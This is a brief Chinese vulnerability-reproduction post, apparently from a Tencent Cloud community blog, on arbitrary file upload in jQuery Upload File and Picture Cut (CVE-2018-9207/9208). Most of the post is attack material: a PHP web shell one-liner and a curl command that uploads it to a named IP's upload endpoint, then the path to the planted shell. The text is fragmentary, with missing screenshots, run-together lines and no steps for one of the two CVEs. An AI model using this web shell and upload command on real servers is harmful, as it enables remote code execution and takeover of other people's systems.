【漏洞复现】 jquery 文件上传 (CVE-2018-9207|CVE-2018-9208)
【漏洞复现】 jquery 文件上传 (CVE-2018-9207|CVE-2018-9208)
reyeye
发布于 2022-10-31 11:53:58
发布于 2022-10-31 11:53:58
1.php
在这里插入图片描述
<?php eval($_POST[1]);(CVE-2018-9208)
jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。
jQuery Upload File <= 4.0.2 中的任意文件上传
curl -F "myfile=@1.php" "http://123.58.224.8:41698/jquery-upload-file/php/upload.php"http://123.58.224.8:41698/jquery-upload-file/php/uploads/1.php(CVE-2018-9208)
picture cut是一个jquery插件,以非常友好和简单的方式处理图像,具有基于bootstrap或jquery ui的漂亮界面,具有ajax上传,从资源管理器拖动图像,图像裁剪等强大的功能
本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2022-10-21,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录